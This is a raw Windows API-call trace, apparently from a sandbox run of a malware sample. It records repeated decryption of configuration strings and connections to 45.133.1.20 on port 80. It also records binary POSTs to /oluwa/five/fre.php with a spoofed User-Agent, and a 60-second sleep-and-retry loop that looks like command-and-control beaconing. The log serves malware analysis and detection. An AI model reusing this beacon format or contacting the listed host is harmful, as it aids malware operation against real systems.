StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0162.110] GetProcessHeap () returned 0x6a0000 [0162.110] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0162.110] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0162.111] GetProcessHeap () returned 0x6a0000 [0162.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0162.111] GetProcessHeap () returned 0x6a0000 [0162.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0162.114] GetProcessHeap () returned 0x6a0000 [0162.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0162.115] GetProcessHeap () returned 0x6a0000 [0162.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0162.116] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.116] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0162.121] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.122] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0162.138] GetProcessHeap () returned 0x6a0000 [0162.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0162.139] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.139] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0162.140] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.141] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0162.141] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.141] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0162.141] GetProcessHeap () returned 0x6a0000 [0162.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0162.143] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.143] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0162.144] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.144] CryptDestroyKey (hKey=0x6ad560) returned 1 [0162.145] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.148] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0162.148] GetProcessHeap () returned 0x6a0000 [0162.148] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0162.149] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0162.149] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0162.150] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0162.150] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0162.151] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0162.151] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0162.152] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0162.153] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0162.153] GetProcessHeap () returned 0x6a0000 [0162.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0162.153] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9a78*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea78*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0162.153] GetProcessHeap () returned 0x6a0000 [0162.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba970 [0162.153] socket (af=2, type=1, protocol=6) returned 0x2c4 [0162.154] connect (s=0x2c4, name=0x6bea78*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0162.179] FreeAddrInfoW (pAddrInfo=0x6b9a78*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea78*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0162.179] GetProcessHeap () returned 0x6a0000 [0162.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0162.179] GetProcessHeap () returned 0x6a0000 [0162.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c2708 [0162.180] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0162.180] wvsprintfA (in: param_1=0x6c2708, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0162.180] GetProcessHeap () returned 0x6a0000 [0162.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0162.181] GetProcessHeap () returned 0x6a0000 [0162.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0162.181] GetProcessHeap () returned 0x6a0000 [0162.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0162.181] GetProcessHeap () returned 0x6a0000 [0162.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c2708 [0162.182] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0162.183] wvsprintfA (in: param_1=0x6c2708, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0162.183] GetProcessHeap () returned 0x6a0000 [0162.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0162.183] GetProcessHeap () returned 0x6a0000 [0162.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0162.183] send (s=0x2c4, buf=0x6bbd20*, len=242, flags=0) returned 242 [0162.184] send (s=0x2c4, buf=0x6bb998*, len=159, flags=0) returned 159 [0162.184] GetProcessHeap () returned 0x6a0000 [0162.184] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0162.184] recv (in: s=0x2c4, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0162.269] GetProcessHeap () returned 0x6a0000 [0162.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0162.270] GetProcessHeap () returned 0x6a0000 [0162.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0162.270] GetProcessHeap () returned 0x6a0000 [0162.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0162.270] GetProcessHeap () returned 0x6a0000 [0162.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0162.271] closesocket (s=0x2c4) returned 0 [0162.272] GetProcessHeap () returned 0x6a0000 [0162.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba970 | out: hHeap=0x6a0000) returned 1 [0162.272] GetProcessHeap () returned 0x6a0000 [0162.273] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0162.273] GetProcessHeap () returned 0x6a0000 [0162.273] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0162.273] GetProcessHeap () returned 0x6a0000 [0162.273] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0162.274] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1350) returned 0x2c4 [0162.288] Sleep (dwMilliseconds=0xea60) [0162.291] GetProcessHeap () returned 0x6a0000 [0162.291] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0162.291] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.292] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0162.305] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.306] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0162.331] GetProcessHeap () returned 0x6a0000 [0162.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0162.332] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.333] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0162.334] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.334] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0162.335] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.335] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0162.335] GetProcessHeap () returned 0x6a0000 [0162.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0162.337] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.337] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0162.338] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.338] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0162.342] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.342] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0162.342] GetProcessHeap () returned 0x6a0000 [0162.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0162.343] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0162.343] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0162.344] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0162.345] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0162.345] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0162.346] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0162.347] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0162.347] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0162.347] GetProcessHeap () returned 0x6a0000 [0162.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0162.347] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0162.348] GetProcessHeap () returned 0x6a0000 [0162.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0162.348] GetProcessHeap () returned 0x6a0000 [0162.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0162.349] GetProcessHeap () returned 0x6a0000 [0162.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0162.350] GetProcessHeap () returned 0x6a0000 [0162.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0162.352] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.353] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0162.360] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.360] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0162.373] GetProcessHeap () returned 0x6a0000 [0162.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0162.374] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.375] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0162.377] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.378] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0162.379] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.379] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0162.379] GetProcessHeap () returned 0x6a0000 [0162.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0162.381] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.381] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0162.382] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.382] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0162.386] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.386] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0162.386] GetProcessHeap () returned 0x6a0000 [0162.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0162.387] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0162.388] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0162.388] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0162.389] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0162.390] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0162.391] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0162.392] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0162.392] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0162.392] GetProcessHeap () returned 0x6a0000 [0162.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0162.392] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9f50*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be9e8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0162.392] GetProcessHeap () returned 0x6a0000 [0162.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9a0 [0162.392] socket (af=2, type=1, protocol=6) returned 0x2c8 [0162.393] connect (s=0x2c8, name=0x6be9e8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0162.422] FreeAddrInfoW (pAddrInfo=0x6b9f50*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be9e8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0162.422] GetProcessHeap () returned 0x6a0000 [0162.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0162.422] GetProcessHeap () returned 0x6a0000 [0162.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c2708 [0162.423] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0162.424] wvsprintfA (in: param_1=0x6c2708, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0162.424] GetProcessHeap () returned 0x6a0000 [0162.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0162.425] GetProcessHeap () returned 0x6a0000 [0162.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0162.425] GetProcessHeap () returned 0x6a0000 [0162.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0162.425] GetProcessHeap () returned 0x6a0000 [0162.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c2708 [0162.426] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0162.427] wvsprintfA (in: param_1=0x6c2708, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0162.427] GetProcessHeap () returned 0x6a0000 [0162.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0162.427] GetProcessHeap () returned 0x6a0000 [0162.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0162.428] send (s=0x2c8, buf=0x6bbd20*, len=242, flags=0) returned 242 [0162.430] send (s=0x2c8, buf=0x6bb998*, len=159, flags=0) returned 159 [0162.430] GetProcessHeap () returned 0x6a0000 [0162.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0162.430] recv (in: s=0x2c8, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0162.553] GetProcessHeap () returned 0x6a0000 [0162.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0162.553] GetProcessHeap () returned 0x6a0000 [0162.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0162.554] GetProcessHeap () returned 0x6a0000 [0162.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0162.554] GetProcessHeap () returned 0x6a0000 [0162.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0162.555] closesocket (s=0x2c8) returned 0 [0162.556] GetProcessHeap () returned 0x6a0000 [0162.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9a0 | out: hHeap=0x6a0000) returned 1 [0162.556] GetProcessHeap () returned 0x6a0000 [0162.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0162.556] GetProcessHeap () returned 0x6a0000 [0162.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0162.557] GetProcessHeap () returned 0x6a0000 [0162.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0162.557] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xa24) returned 0x2c8 [0162.559] Sleep (dwMilliseconds=0xea60) [0162.561] GetProcessHeap () returned 0x6a0000 [0162.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0162.562] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.563] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0162.577] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.577] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0162.586] GetProcessHeap () returned 0x6a0000 [0162.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0162.587] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.588] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0162.589] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.589] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0162.590] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.590] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0162.591] GetProcessHeap () returned 0x6a0000 [0162.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0162.592] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.592] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0162.593] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.596] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0162.602] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.602] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0162.602] GetProcessHeap () returned 0x6a0000 [0162.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0162.603] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0162.604] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0162.604] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0162.606] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0162.607] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0162.607] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0162.608] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0162.608] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0162.608] GetProcessHeap () returned 0x6a0000 [0162.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0162.608] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0162.609] GetProcessHeap () returned 0x6a0000 [0162.609] 